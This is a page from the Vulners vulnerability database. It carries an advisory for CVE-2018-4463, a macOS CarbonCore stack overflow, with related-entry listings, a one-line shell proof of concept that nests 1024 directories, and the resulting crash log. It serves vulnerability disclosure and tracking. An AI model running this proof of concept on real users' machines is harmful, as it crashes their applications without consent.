Vulners
Lucene search
macOS 10.14.1 Carbon Core Memory corruption Vulnerability
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | macOS 10.14.x < 10.14.2 Multiple Vulnerabilities | 10 Apr 201900:00 | – | nessus |
| macOS 10.14.x < 10.14.2 Multiple Vulnerabilities | 21 Dec 201800:00 | – | nessus |
 | About the security content of macOS Mojave 10.14.2, Security Update 2018-003 High Sierra, Security Update 2018-006 Sierra | 5 Dec 201800:00 | – | apple |
| About the security content of macOS Mojave 10.14.2, Security Update 2018-003 High Sierra, Security Update 2018-006 Sierra - Apple Support | 24 Jun 201908:04 | – | apple |
 | Apple macOS Mojave Carbon Core Memory Corruption Vulnerability | 7 Dec 201800:00 | – | cnvd |
 | CVE-2018-4463 | 3 Apr 201917:43 | – | cve |
 | CVE-2018-4463 | 3 Apr 201917:43 | – | cvelist |
 | EUVD-2018-16249 | 7 Oct 202500:30 | – | euvd |
 | CVE-2018-4463 | 3 Apr 201918:29 | – | nvd |
 | Apple Mac OS X Security Updates (HT209341)-02 | 6 Dec 201800:00 | – | openvas |
10
CVE: CVE-2018-4463
Old and funny bug (CVE-2018-4463) was patched by Apple in last macOS security update. Since 2015 Apple was exposing the users using Apple’s filesystem for stack overflow and infection by hidedd malware in DMG image. Insufficient patch for old vulnerability is the cause of problems
Trivial and funny PoC:
# for i in {1..1024}; do mkdir B && cd B; done
And for macOS 10.13 you will get ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Crashed Thread: 0 Dispatch queue: com.apple.main-thread
Exception Type: EXC_CRASH (SIGABRT)
Exception Codes: 0x0000000000000000, 0x0000000000000000
Exception Note: EXC_CORPSE_NOTIFY
Application Specific Information:
[14239] stack overflow
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 libsystem_kernel.dylib 0x00007fff6baa8b66 __pthread_kill + 10
1 libsystem_pthread.dylib 0x00007fff6bc73080 pthread_kill + 333
2 libsystem_c.dylib 0x00007fff6ba0424d __abort + 144
3 libsystem_c.dylib 0x00007fff6ba04af8 __stack_chk_fail + 205
4 com.apple.CoreServices.CarbonCore 0x00007fff44ce6a66 canonpath(char const*, char*, int*) + 971
5 com.apple.CoreServices.CarbonCore 0x00007fff44ca50c6 FSGetCanonicalPath + 143
6 com.apple.CoreServices.CarbonCore 0x00007fff44ce6f88 PathGetObjectInfo(char const*, unsigned int, short*, unsigned int*, unsigned int*, char*, unsigned int*, unsigned char*, unsigned int*) + 135
7 com.apple.CoreServices.CarbonCore 0x00007fff44cf2fed FSPathMakeRefInternal(unsigned char const*, unsigned int, FSRef*, unsigned char*) + 99
8 com.apple.CoreFoundation 0x00007fff43b36444 _CFGetFSRefFromURL + 276
9 com.apple.AppKit 0x00007fff412c2194 -[NSThemeDocumentButton _refreshDocumentIconAndDisplayNameForURL:] + 74
...
30 com.apple.AppKit 0x00007fff4107aa72 NSApplicationMain + 804
31 libdyld.dylib 0x00007fff6b958015 start + 1
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
where stack smashing protection prevented the stack overflow but the terminal has crashed. Special crafted hierarchy making the malware possibility to hidde mailcous code in place where the most of antiviruses have no access.
Credit:
Maksymilian Arciemowicz
References:
https://cxsecurity.com/issue/WLB-2015100149
https://support.apple.com/en-us/HT209341
https://cxsecurity.com/
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Dec 2018 00:00Current
0.2Low risk
Vulners AI Score0.2
CVSS 37.8
CVSS 29.3
EPSS0.00171